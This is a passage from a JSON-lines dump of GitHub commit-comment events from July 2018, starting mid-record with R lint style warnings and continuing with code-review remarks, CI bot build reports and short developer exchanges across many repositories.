**Variable or function name should be lowerCamelCase.**\n```r\n​  Ras <- world2raster(x)\n  ^~~\n```\n[R/plot.R:53:3:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/plot.R#L53) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Ras <- world2raster(x)\n  ^~~\n```\n[R/quickPlot.R:179:39:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/quickPlot.R#L179) *style:* **Commas should always have a space after.**\n```r\n​    grobToPlot@.Data <- toPlot@.Data[,,sGrob@layerName];\n                                      ^\n```\n[R/world-functions.R:517:25:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/world-functions.R#L517) *style:* **Put spaces around all infix operators.**\n```r\n​          mid <- floor(n/2)\n                       ~^~\n```\n[R/world-functions.R:534:9:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/world-functions.R#L534) *style:* **Commented code should be removed.**\n```r\n​    #   cat(\"names       :\", paste(ln, collapse=\", \"), \"\\n\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/world-functions.R:538:28:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/world-functions.R#L538) *style:* **Commas should always have a space after.**\n```r\n​    print(object@.Data[1:4,1:4,])\n                           ^\n```\n[R/world-functions.R:538:32:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/world-functions.R#L538) *style:* **Commas should always have a space after.**\n```r\n​    print(object@.Data[1:4,1:4,])\n                               ^\n```\n[R/worldNLR-classes-methods.R:340:5:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/worldNLR-classes-methods.R#L340) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    NLwMs <- list(...)\n    ^~~~~\n```\n[tests/testthat/test-plotting.R:6:3:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/tests/testthat/test-plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  t1_0 <- createTurtles(n = 10, coords = cbind(rep(0, 10), rep(0, 10)))\n  ^~~~\n```"}},"created_at":"2018-07-25T03:47:16Z"}
{"id":"8014003668","type":"CommitCommentEvent","actor":{"login":"billziss-gh"},"repo":{"name":"asciidoc/asciidoc"},"payload":{"comment":{"id":29823559,"position":null,"line":null,"path":null,"commit_id":"27df6dd0dcb4d0b58913f0ff436785a0b8992077","created_at":"2018-07-25T03:48:14Z","updated_at":"2018-07-25T03:48:14Z","author_association":"NONE","body":"This change breaks asciidoc on macOS. There is no `python2` on that platform. There is `python` and `python2.7`."}},"created_at":"2018-07-25T03:48:14Z"}
{"id":"8014005727","type":"CommitCommentEvent","actor":{"login":"beckettze"},"repo":{"name":"beckettze/googleRec"},"payload":{"comment":{"id":29823563,"position":null,"line":null,"path":null,"commit_id":"b9ec09d7d1c555280431489112e409dd2c71ce10","created_at":"2018-07-25T03:49:09Z","updated_at":"2018-07-25T03:49:09Z","author_association":"OWNER","body":"![googlelogo_color_272x92dp](https://user-images.githubusercontent.com/23226574/43178587-025ce4ba-8f83-11e8-99ad-967bb782b382.png)\r\n"}},"created_at":"2018-07-25T03:49:09Z"}
{"id":"8014016221","type":"CommitCommentEvent","actor":{"login":"HandsomeEffortMonster"},"repo":{"name":"HandsomeEffortMonster/TTUForAndroid"},"payload":{"comment":{"id":29823579,"position":23,"line":23,"path":"app/src/main/java/com/lzh/tools/netty/MyClientHandler.java","commit_id":"53cc9d572e97926c37317d923477419f8d0808c3","created_at":"2018-07-25T03:53:20Z","updated_at":"2018-07-25T03:53:20Z","author_association":"OWNER","body":"点卡"}},"created_at":"2018-07-25T03:53:20Z"}
{"id":"8014017038","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"NateWickstrom/remittance-spolidity"},"payload":{"comment":{"id":29823581,"position":3,"line":3,"path":"contracts/UsedPasswords.sol","commit_id":"811e9b0e0ab2270fc763971203de4548aa5fe5c4","created_at":"2018-07-25T03:53:40Z","updated_at":"2018-07-25T03:53:40Z","author_association":"NONE","body":"This threw me off for a just a few seconds of mental overhead while I confirmed that these are not really passwords but hashes of passwords, so I might suggest considering naming again. \r\n\r\nThis an interesting way of registering/blacklisting hashes that have been seen before. I can see how it would be useful between contracts if they use it. \r\n\r\nI'm going to suggest an alternative so you know about the tools in the box. "}},"created_at":"2018-07-25T03:53:40Z"}
{"id":"8014017705","type":"CommitCommentEvent","actor":{"login":"weitzman"},"repo":{"name":"previousnext/mysql-toolkit"},"payload":{"comment":{"id":29823585,"position":null,"line":null,"path":null,"commit_id":"f59e295e1b3c23b73dcd2824e29b105fd7783987","created_at":"2018-07-25T03:53:57Z","updated_at":"2018-07-25T03:53:57Z","author_association":"NONE","body":"❤️ 🎵 🐟 "}},"created_at":"2018-07-25T03:53:57Z"}
{"id":"8014019842","type":"CommitCommentEvent","actor":{"login":"TheRebelG0d"},"repo":{"name":"TheRebelG0d/avatarcropper"},"payload":{"comment":{"id":29823588,"position":null,"line":null,"path":null,"commit_id":"73aad3acab3c43d88f72827582582b51e916ec30","created_at":"2018-07-25T03:54:51Z","updated_at":"2018-07-25T03:54:51Z","author_association":"OWNER","body":"> this is cool why u not merge request !!\r\n\r\nSorry, I meant to do a PR a long time ago but forgot about it. I noticed there are some merge conflicts now, so I'll clean those up and do a PR tomorrow or the day after."}},"created_at":"2018-07-25T03:54:51Z"}
{"id":"8014021003","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29823590,"position":null,"line":null,"path":null,"commit_id":"77342e2a9bd60aedb5ff62ab0e61bb349468cdd9","created_at":"2018-07-25T03:55:20Z","updated_at":"2018-07-25T03:55:20Z","author_association":"NONE","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2018-07-25T03:55:20Z"}
{"id":"8014023201","type":"CommitCommentEvent","actor":{"login":"amitchauhan18may"},"repo":{"name":"amitchauhan18may/kernel-prog"},"payload":{"comment":{"id":29823594,"position":null,"line":null,"path":null,"commit_id":"1bd04776ad483f1f1e6f13aa74002989ba874760","created_at":"2018-07-25T03:56:14Z","updated_at":"2018-07-25T03:56:14Z","author_association":"OWNER","body":"Reference: http://www.catb.org/esr/structure-packing/\r\nThe simplest way to eliminate slop is to reorder the structure members by decreasing alignment. That is: make all the pointer-aligned subfields come first, because on a 64-bit machine they will be 8 bytes. Then the 4-byte ints; then the 2-byte shorts; then the character fields."}},"created_at":"2018-07-25T03:56:14Z"}
{"id":"8014025093","type":"CommitCommentEvent","actor":{"login":"mrwebc"},"repo":{"name":"mvcweb75/community"},"payload":{"comment":{"id":29823599,"position":16,"line":16,"path":"headline/headline.html","commit_id":"4fa4963a2f31ac693e58672d85439822875f255e","created_at":"2018-07-25T03:57:01Z","updated_at":"2018-07-25T03:57:01Z","author_association":"COLLABORATOR","body":"홍길동을 실명으로 바꿔주세요"}},"created_at":"2018-07-25T03:57:01Z"}
{"id":"8014026601","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"NateWickstrom/remittance-spolidity"},"payload":{"comment":{"id":29823605,"position":13,"line":25,"path":"contracts/Remittance.sol","commit_id":"811e9b0e0ab2270fc763971203de4548aa5fe5c4","created_at":"2018-07-25T03:57:36Z","updated_at":"2018-07-25T03:57:36Z","author_association":"NONE","body":"Or ... `mapping(bytes32 => RemittanceStruct) ...` where the index is hash of receiver and secret. \r\n\r\nBut what if the contract code is re-used? That would mean the contracts wouldn't know that the puzzle was solved in a different contract?\r\n\r\nA solution to _that_ problem is to make `address(this)` part of the hash algo, so pseudo .... hash(this, address, secret). \r\n\r\nNotice I called it RemittanceStruct versus \"account\" ... in my mind it's more of magic box than a user. \r\n\r\nThese are contrived examples, so my purpose here is not to say your way is necessarily wrong. You might want to play with the alternative suggested to see if it gets more concise. \r\n"}},"created_at":"2018-07-25T03:57:36Z"}
{"id":"8014028679","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29823607,"position":null,"line":null,"path":null,"commit_id":"aa2e997b3d72018e95fa8355e30e94298593b6c7","created_at":"2018-07-25T03:58:23Z","updated_at":"2018-07-25T03:58:23Z","author_association":"NONE","body":"issue_#6601_1 (mjwitte) - Win64-Windows-7-VisualStudio-14: OK (2945 of 2945 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aa2e997b3d72018e95fa8355e30e94298593b6c7-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aa2e997b3d72018e95fa8355e30e94298593b6c7-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-25T03:58:23Z"}
{"id":"8014029110","type":"CommitCommentEvent","actor":{"login":"elextr"},"repo":{"name":"asciidoc/asciidoc"},"payload":{"comment":{"id":29823608,"position":null,"line":null,"path":null,"commit_id":"27df6dd0dcb4d0b58913f0ff436785a0b8992077","created_at":"2018-07-25T03:58:34Z","updated_at":"2018-07-25T03:58:34Z","author_association":"CONTRIBUTOR","body":"This change is in accordance with the Python recommendations, see [PEP 394](https://www.python.org/dev/peps/pep-0394/).\r\n\r\nI am afraid that for some reason your install of Python does not meet those recommendations, in particular \"`python2` will point to some version of Python 2.x\".  You should point the provider to the PEP linked above."}},"created_at":"2018-07-25T03:58:34Z"}
{"id":"8014031081","type":"CommitCommentEvent","actor":{"login":"Dobby233Liu"},"repo":{"name":"Z-P-J/sjly"},"payload":{"comment":{"id":29823613,"position":59,"line":73,"path":"app/src/main/java/com/sjly/zpj/MainActivity.java","commit_id":"3b284f9bbf78f4c4d4c75207ad70fafdc8d5870d","created_at":"2018-07-25T03:59:23Z","updated_at":"2018-07-25T03:59:23Z","author_association":"NONE","body":"~~终于不用看那个的网页版的广告了(o u o)っ~~"}},"created_at":"2018-07-25T03:59:23Z"}
{"id":"8014035495","type":"CommitCommentEvent","actor":{"login":"saulpw"},"repo":{"name":"saulpw/visidata"},"payload":{"comment":{"id":29823620,"position":10,"line":190,"path":"dev/commands.tsv","commit_id":"30bc1a097d0acb6a5ae15ba8d0fb1c5a6a82d108","created_at":"2018-07-25T04:00:58Z","updated_at":"2018-07-25T04:00:58Z","author_association":"OWNER","body":"omit \"all visible columns\" and \"in current column\" above.  expressions work over the entire row implicitly."}},"created_at":"2018-07-25T04:00:58Z"}
{"id":"8014035965","type":"CommitCommentEvent","actor":{"login":"elextr"},"repo":{"name":"asciidoc/asciidoc"},"payload":{"comment":{"id":29823621,"position":null,"line":null,"path":null,"commit_id":"27df6dd0dcb4d0b58913f0ff436785a0b8992077","created_at":"2018-07-25T04:01:09Z","updated_at":"2018-07-25T04:01:09Z","author_association":"CONTRIBUTOR","body":"And of course you can create a suitable `python2` link yourself."}},"created_at":"2018-07-25T04:01:09Z"}
{"id":"8014036511","type":"CommitCommentEvent","actor":{"login":"madskristensen"},"repo":{"name":"madskristensen/EditorConfigLanguage"},"payload":{"comment":{"id":29823623,"position":22,"line":204,"path":"src/EditorConfig.csproj","commit_id":"df0cc12522a95edbaff5e57d19f2e87d1bc74b30","created_at":"2018-07-25T04:01:21Z","updated_at":"2018-07-25T04:01:21Z","author_association":"OWNER","body":"It should not be in the .vsix since it is already included in VS"}},"created_at":"2018-07-25T04:01:21Z"}
{"id":"8014036683","type":"CommitCommentEvent","actor":{"login":"lucasgaley"},"repo":{"name":"romanchereshnev/HuGaDB"},"payload":{"comment":{"id":29823624,"position":null,"line":null,"path":null,"commit_id":"f99dbf85b38e4cd79ccaec70ee12ae9d68f3ad22","created_at":"2018-07-25T04:01:25Z","updated_at":"2018-07-25T04:01:25Z","author_association":"NONE","body":"Hello,\r\n\r\nI had the same issue in the past. It's a github data management thing. In the README you can find both Dropbox and Google Drive links for the zip files."}},"created_at":"2018-07-25T04:01:25Z"}
{"id":"8014036791","type":"CommitCommentEvent","actor":{"login":"jnothman"},"repo":{"name":"janvanrijn/scikit-learn"},"payload":{"comment":{"id":29823625,"position":37,"line":55,"path":"sklearn/datasets/openml.py","commit_id":"857042f79403f8a429aa55e8086385a8b2e5f9c7","created_at":"2018-07-25T04:01:28Z","updated_at":"2018-07-25T04:01:28Z","author_association":"NONE","body":"A python hash is not discriminative enough; there is a chance of collision. Why have you gone down this path?"}},"created_at":"2018-07-25T04:01:28Z"}
{"id":"8014037301","type":"CommitCommentEvent","actor":{"login":"Dobby233Liu"},"repo":{"name":"Z-P-J/sjly"},"payload":{"comment":{"id":29823626,"position":10,"line":10,"path":"app/src/main/java/com/sjly/zpj/fragment/XinHaiFragment.java","commit_id":"3b284f9bbf78f4c4d4c75207ad70fafdc8d5870d","created_at":"2018-07-25T04:01:40Z","updated_at":"2018-07-25T04:01:40Z","author_association":"NONE","body":"~~WTF~~"}},"created_at":"2018-07-25T04:01:40Z"}
{"id":"8014038665","type":"CommitCommentEvent","actor":{"login":"madskristensen"},"repo":{"name":"madskristensen/EditorConfigLanguage"},"payload":{"comment":{"id":29823627,"position":16,"line":198,"path":"src/EditorConfig.csproj","commit_id":"df0cc12522a95edbaff5e57d19f2e87d1bc74b30","created_at":"2018-07-25T04:02:10Z","updated_at":"2018-07-25T04:02:10Z","author_association":"OWNER","body":"Delete app.config. It has no effect in an extension "}},"created_at":"2018-07-25T04:02:10Z"}
{"id":"8014041154","type":"CommitCommentEvent","actor":{"login":"Dobby233Liu"},"repo":{"name":"Z-P-J/sjly"},"payload":{"comment":{"id":29823632,"position":null,"line":null,"path":null,"commit_id":"3b284f9bbf78f4c4d4c75207ad70fafdc8d5870d","created_at":"2018-07-25T04:03:07Z","updated_at":"2018-07-25T04:03:07Z","author_association":"NONE","body":"反正1.1还是不错der."}},"created_at":"2018-07-25T04:03:07Z"}
{"id":"8014042468","type":"CommitCommentEvent","actor":{"login":"madskristensen"},"repo":{"name":"madskristensen/EditorConfigLanguage"},"payload":{"comment":{"id":29823635,"position":34,"line":390,"path":"src/EditorConfig.csproj","commit_id":"df0cc12522a95edbaff5e57d19f2e87d1bc74b30","created_at":"2018-07-25T04:03:38Z","updated_at":"2018-07-25T04:03:38Z","author_association":"OWNER","body":"It must be version 8 since that's the version shipped by VS 15.0. Please downgrade "}},"created_at":"2018-07-25T04:03:38Z"}
{"id":"8014049077","type":"CommitCommentEvent","actor":{"login":"madskristensen"},"repo":{"name":"madskristensen/EditorConfigLanguage"},"payload":{"comment":{"id":29823638,"position":1,"line":1,"path":"src/app.config","commit_id":"df0cc12522a95edbaff5e57d19f2e87d1bc74b30","created_at":"2018-07-25T04:06:14Z","updated_at":"2018-07-25T04:06:14Z","author_association":"OWNER","body":"Delete this file "}},"created_at":"2018-07-25T04:06:14Z"}
{"id":"8014049395","type":"CommitCommentEvent","actor":{"login":"PippaC"},"repo":{"name":"ceciliachoi/SecureGateway"},"payload":{"comment":{"id":29823640,"position":null,"line":null,"path":null,"commit_id":"21bf89fae01ec31bdb7de21e0315af7b06e95218","created_at":"2018-07-25T04:06:22Z","updated_at":"2018-07-25T04:06:22Z","author_association":"NONE","body":"Just wonder if list all the internal node hosts here in public document would cause some security concern by malicious attack? If the host of port `9000` is the same as the host of SG server which user can retrive from IBM cloud, perhaps we don't need to list all the hostname of nodes here, only need to list the host of port `443`.\r\n\r\nI'm OK if you guys have no concern about it, thanks.\r\n"}},"created_at":"2018-07-25T04:06:22Z"}
{"id":"8014050071","type":"CommitCommentEvent","actor":{"login":"ScrappyZhang"},"repo":{"name":"ScrappyZhang/ecommerce_website_development"},"payload":{"comment":{"id":29823642,"position":null,"line":null,"path":null,"commit_id":"9705d873ac515d710b28439ef97028a02f0fd9bc","created_at":"2018-07-25T04:06:38Z","updated_at":"2018-07-25T04:06:38Z","author_association":"OWNER","body":"Python3.6\n\n> 在 2018年7月25日，上午11:10，jpgzs <notifications@github.com> 写道：\n> \n> 你这是Python 几开发的 是python3.5 以后的版本吗？\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub <https://github.com/ScrappyZhang/ecommerce_website_development/commit/9705d873ac515d710b28439ef97028a02f0fd9bc#commitcomment-29823385>, or mute the thread <https://github.com/notifications/unsubscribe-auth/Ag_grf1KdQsaO-Q_FS0EdfFJQkMmo4lVks5uJ-GWgaJpZM4VfXHd>.\n> \n\n"}},"created_at":"2018-07-25T04:06:38Z"}
{"id":"8014053722","type":"CommitCommentEvent","actor":{"login":"SsnL"},"repo":{"name":"pytorch/pytorch"},"payload":{"comment":{"id":29823653,"position":7,"line":32,"path":"torch/nn/parallel/data_parallel.py","commit_id":"805639906a89f22be387546e958d08451882dc13","created_at":"2018-07-25T04:08:08Z","updated_at":"2018-07-25T04:08:08Z","author_association":"CONTRIBUTOR","body":"Hi, you are looking at a really old commit. The message has changed in current master. "}},"created_at":"2018-07-25T04:08:08Z"}
{"id":"8014060129","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29823659,"position":null,"line":null,"path":null,"commit_id":"7a3c5410770ec0752f72ce13f87bef6601c4aa0d","created_at":"2018-07-25T04:10:43Z","updated_at":"2018-07-25T04:10:43Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/translations-in-the-design/93052/4\n"}},"created_at":"2018-07-25T04:10:43Z"}
{"id":"8014063655","type":"CommitCommentEvent","actor":{"login":"dlongley"},"repo":{"name":"digitalbazaar/bedrock-webpack"},"payload":{"comment":{"id":29823665,"position":77,"line":333,"path":"lib/index.js","commit_id":"4bee5cbd96a0f00fc71681fb5abd524e0e3d6fa3","created_at":"2018-07-25T04:12:13Z","updated_at":"2018-07-25T04:12:13Z","author_association":"MEMBER","body":"I wonder if this method might be problematic ... and if we should use `require.resolve` or if the information is already in the package object that bedrock-views generated (I thought maybe we did this somewhere to produce package paths already). If we do generate this path already (or a path to the root package at least), it would be good to reuse that so the code stays in one place.\r\n\r\nLeaving this comment here but it shouldn't be a blocker, just worth investigating."}},"created_at":"2018-07-25T04:12:13Z"}
{"id":"8014070370","type":"CommitCommentEvent","actor":{"login":"trungams"},"repo":{"name":"idoneam/Canary"},"payload":{"comment":{"id":29823675,"position":null,"line":null,"path":null,"commit_id":"4a2b310241f1132ddcb90b657b30b3d7cda8b2c8","created_at":"2018-07-25T04:15:01Z","updated_at":"2018-07-25T04:15:01Z","author_association":"MEMBER","body":"in progress for #73 "}},"created_at":"2018-07-25T04:15:01Z"}
{"id":"8014072113","type":"CommitCommentEvent","actor":{"login":"virginiayung"},"repo":{"name":"virginiayung/scipy_proceedings"},"payload":{"comment":{"id":29823679,"position":43,"line":121,"path":"papers/virginia_ng/Scipy2018_first_draft.rst","commit_id":"2458d2aa294aced1785394660c3ea434b4493fd1","created_at":"2018-07-25T04:15:46Z","updated_at":"2018-07-25T04:15:46Z","author_association":"OWNER","body":"> each box object is comprised of 11 numbers. Multiplying by boxes per grid cell and grid cells per image, this project's YOLOv2 network therefore always yields 11 × 5 × 13 × 13 = 9,295 outputs per image.\r\n\r\neach bounding box is comprised of 11 numbers. Multiplying by boxes per grid cell and grid cells per image, this project's YOLOv2 network therefore always yields 13 x 13 x 5 x 11 = 9,295 outputs per image."}},"created_at":"2018-07-25T04:15:46Z"}
{"id":"8014082106","type":"CommitCommentEvent","actor":{"login":"minombreesjeff"},"repo":{"name":"minombreesjeff/darwin_env"},"payload":{"comment":{"id":29823700,"position":null,"line":null,"path":null,"commit_id":"2e8489c610fedfabdbd7e5a6c41167553c828802","created_at":"2018-07-25T04:19:52Z","updated_at":"2018-07-25T04:19:52Z","author_association":"OWNER","body":"Collision 96.20.2~98"}},"created_at":"2018-07-25T04:19:52Z"}
{"id":"8014084638","type":"CommitCommentEvent","actor":{"login":"billziss-gh"},"repo":{"name":"asciidoc/asciidoc"},"payload":{"comment":{"id":29823709,"position":null,"line":null,"path":null,"commit_id":"27df6dd0dcb4d0b58913f0ff436785a0b8992077","created_at":"2018-07-25T04:20:55Z","updated_at":"2018-07-25T04:20:55Z","author_association":"NONE","body":"Thanks for your answer.\r\n\r\nMy install of Python is the default on macOS. This means that users of asciidoc on macOS will have the same problem regardless of PEP recommendations.\r\n\r\n> And of course you can create a suitable python2 link yourself.\r\n\r\nI am aware of this of course. However many of your macOS users may not be.\r\n\r\nPerhaps it would be better if this was changed to:\r\n\r\n```\r\n#!/usr/bin/env python2.7\r\n```\r\n\r\nThis is inline with the linked PEP and would work on macOS (although it would no longer support python 2.6 out of the box)."}},"created_at":"2018-07-25T04:20:55Z"}
{"id":"8014105559","type":"CommitCommentEvent","actor":{"login":"virginiayung"},"repo":{"name":"virginiayung/scipy_proceedings"},"payload":{"comment":{"id":29823771,"position":70,"line":143,"path":"papers/virginia_ng/Scipy2018_first_draft.rst","commit_id":"2458d2aa294aced1785394660c3ea434b4493fd1","created_at":"2018-07-25T04:29:30Z","updated_at":"2018-07-25T04:29:30Z","author_association":"OWNER","body":"> We experimented with a Pyramid Scene Parsing Network (PSPNet) [pspnet]_ architecture for a 4-class segmentation task on buildings, roads, water, and vegetation. PSPNet adds a multi-scale pooling on top of the backend model to aggregate different scales of information. The upsampling layer is implemented by bilinear interpolation. After concatenation, PSPNet fuses different levels of feature with a 3x3 convolution. As seen in Figure 6, PSPNet produced good-quality segmentation masks in our tests on scenes with complex features. For the 2-class parking lot task, however, we found PSPNet unnecessarily complex.\r\n\r\n"}},"created_at":"2018-07-25T04:29:30Z"}
{"id":"8014110962","type":"CommitCommentEvent","actor":{"login":"virginiayung"},"repo":{"name":"virginiayung/scipy_proceedings"},"payload":{"comment":{"id":29823785,"position":73,"line":145,"path":"papers/virginia_ng/Scipy2018_first_draft.rst","commit_id":"2458d2aa294aced1785394660c3ea434b4493fd1","created_at":"2018-07-25T04:31:41Z","updated_at":"2018-07-25T04:31:41Z","author_association":"OWNER","body":"> This is a technique we have applied to improve model accuracy. During a training session, when a model produces a false positive detection for a sample in the testing set, we move that sample to the training set.\r\n\r\nThis is a technique we have applied to improve model accuracy. During a training session, when a model produces a false positive detection for a sample in the testing set, we move that sample to the training set and explicitly label it as a negative sample."}},"created_at":"2018-07-25T04:31:41Z"}
{"id":"8014112131","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29823787,"position":null,"line":null,"path":null,"commit_id":"e2d2505943ff98ffb8a9363793d736cb920f2b7a","created_at":"2018-07-25T04:32:13Z","updated_at":"2018-07-25T04:32:13Z","author_association":"NONE","body":"kiva-non-quad-walls (nealkruis) - i386-Windows-7-VisualStudio-14: OK (2947 of 2947 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e2d2505943ff98ffb8a9363793d736cb920f2b7a-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e2d2505943ff98ffb8a9363793d736cb920f2b7a-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-25T04:32:13Z"}
{"id":"8014112327","type":"CommitCommentEvent","actor":{"login":"Muhamadou"},"repo":{"name":"Muhamadou/Muhamadou.github.io"},"payload":{"comment":{"id":29823788,"position":4,"line":4,"path":"Aspca.html","commit_id":"eedd32aed5658265d815088bb3bcbdcb88ea6da9","created_at":"2018-07-25T04:32:18Z","updated_at":"2018-07-25T04:32:18Z","author_association":"OWNER","body":"non-part"}},"created_at":"2018-07-25T04:32:18Z"}
{"id":"8014114486","type":"CommitCommentEvent","actor":{"login":"twalpole"},"repo":{"name":"SeleniumHQ/selenium"},"payload":{"comment":{"id":29823791,"position":6,"line":362,"path":"rb/lib/selenium/webdriver/remote/w3c/bridge.rb","commit_id":"da6efc1b1b4809e20930050fe3a369032d00e1b7","created_at":"2018-07-25T04:33:14Z","updated_at":"2018-07-25T04:33:14Z","author_association":"CONTRIBUTOR","body":"OSS bridge should probably be doing the same thing.  Local chromedriver has supported passing multiple filenames separated by \\n for a long time, as did the old Firefox driver.  Geckodriver/Firefox 62 now supports it again (to be WebDriver spec compliant) and the next IE driver supports it too according to @jimevans.  For that to be useful with a remote driver the string of filenames needs to be split on \\n and each file uploaded separately.  The remote server may also need to be updated to correctly check for the existence of multiple files.\r\n"}},"created_at":"2018-07-25T04:33:14Z"}
{"id":"8014115229","type":"CommitCommentEvent","actor":{"login":"graeme-winter"},"repo":{"name":"cctbx/cctbx_project"},"payload":{"comment":{"id":29823793,"position":null,"line":null,"path":null,"commit_id":"71a4ab94a7910256c178baf2e275fd8165cd3973","created_at":"2018-07-25T04:33:30Z","updated_at":"2018-07-25T04:33:30Z","author_association":"CONTRIBUTOR","body":"Judging from the build outcomes I suspect you need some additional sentinel code to ensure this reads only the files intended?\r\n\r\n```\r\n3 tests failed.\r\nFAILED:  dxtbx.build_dials.modules.cctbx_project.dxtbx.tests.test_regression_images.test_no_multiple_format_understanding[SACLA_MPCCD_Cheetah/run266702-0-subset.h5]\r\n\r\nError Message:\r\nexit code 1\r\n\r\nStack Trace:\r\n\r\n\r\nFAILED:  dxtbx.build_dials.modules.cctbx_project.dxtbx.tests.test_regression_images.test_no_multiple_format_understanding[putative_imgCIF_HDF5_mapping/minicbf.h5]\r\n\r\nError Message:\r\nexit code 1\r\n\r\nStack Trace:\r\n\r\n\r\nFAILED:  dxtbx.build_dials.modules.cctbx_project.dxtbx.tests.test_regression_images.test_no_multiple_format_understanding[putative_imgCIF_HDF5_mapping/X4_wide_M1S4_1.nxs]\r\n\r\nError Message:\r\nexit code 1\r\n\r\nStack Trace:\r\n```\r\n\r\nfrom automated testing. Alternative could be working into the existing SACLA reader? @phyy-nx you have an opinion?"}},"created_at":"2018-07-25T04:33:30Z"}
{"id":"8014124843","type":"CommitCommentEvent","actor":{"login":"venupendota"},"repo":{"name":"venupendota/DragAndDrop"},"payload":{"comment":{"id":29823802,"position":null,"line":null,"path":null,"commit_id":"34246191176c0a99c9ca6490957ced3ef087e1db","created_at":"2018-07-25T04:37:41Z","updated_at":"2018-07-25T04:37:41Z","author_association":"OWNER","body":"MIT License"}},"created_at":"2018-07-25T04:37:41Z"}
{"id":"8014131184","type":"CommitCommentEvent","actor":{"login":"tobozo"},"repo":{"name":"tobozo/M5Stack-SD-Updater"},"payload":{"comment":{"id":29823809,"position":null,"line":null,"path":null,"commit_id":"df666a0d785ee9ed7292774f13fb3ed45c2b8501","created_at":"2018-07-25T04:40:21Z","updated_at":"2018-07-25T04:40:21Z","author_association":"OWNER","body":"I'm sorry you took that as a bash down, been upvoting all I could and challenging where possible.\r\nPlease show your app code so I can at least give one star back, and eventually contribute :-)"}},"created_at":"2018-07-25T04:40:21Z"}
{"id":"8014131381","type":"CommitCommentEvent","actor":{"login":"mike-wendt"},"repo":{"name":"mike-wendt/jenkins-material-theme"},"payload":{"comment":{"id":29823810,"position":null,"line":null,"path":null,"commit_id":"2220a33ece210c4e68176738b356bae8f67e58e9","created_at":"2018-07-25T04:40:26Z","updated_at":"2018-07-25T04:40:26Z","author_association":"OWNER","body":"This is to fix an issue on GitHub pages where the double curly brackets are replaced with nothing resulting in \r\n> Replace `` in the URL by the chosen color: https://cdn.rawgit.com/afonsof/jenkins-material-theme/gh-pages/dist/material-.css"}},"created_at":"2018-07-25T04:40:26Z"}
{"id":"8014132018","type":"CommitCommentEvent","actor":{"login":"thaingiW"},"repo":{"name":"RayanWang/Speech_emotion_recognition_BLSTM"},"payload":{"comment":{"id":29823811,"position":null,"line":null,"path":null,"commit_id":"a188fa376885ec830b176dc77e89ec708a8bad19","created_at":"2018-07-25T04:40:39Z","updated_at":"2018-07-25T04:40:39Z","author_association":"NONE","body":"What code should be changed in audioFeatureExtraction.py?What code should be added in stFeatureSpeed.?"}},"created_at":"2018-07-25T04:40:39Z"}
{"id":"8014132766","type":"CommitCommentEvent","actor":{"login":"Betrayed49"},"repo":{"name":"Betrayed49/android-NotificationChannels"},"payload":{"comment":{"id":29823812,"position":null,"line":null,"path":null,"commit_id":"4ccb3d1412aada317155df2c713a7243492474ae","created_at":"2018-07-25T04:40:53Z","updated_at":"2018-07-25T04:40:53Z","author_association":"OWNER","body":"Hello"}},"created_at":"2018-07-25T04:40:53Z"}
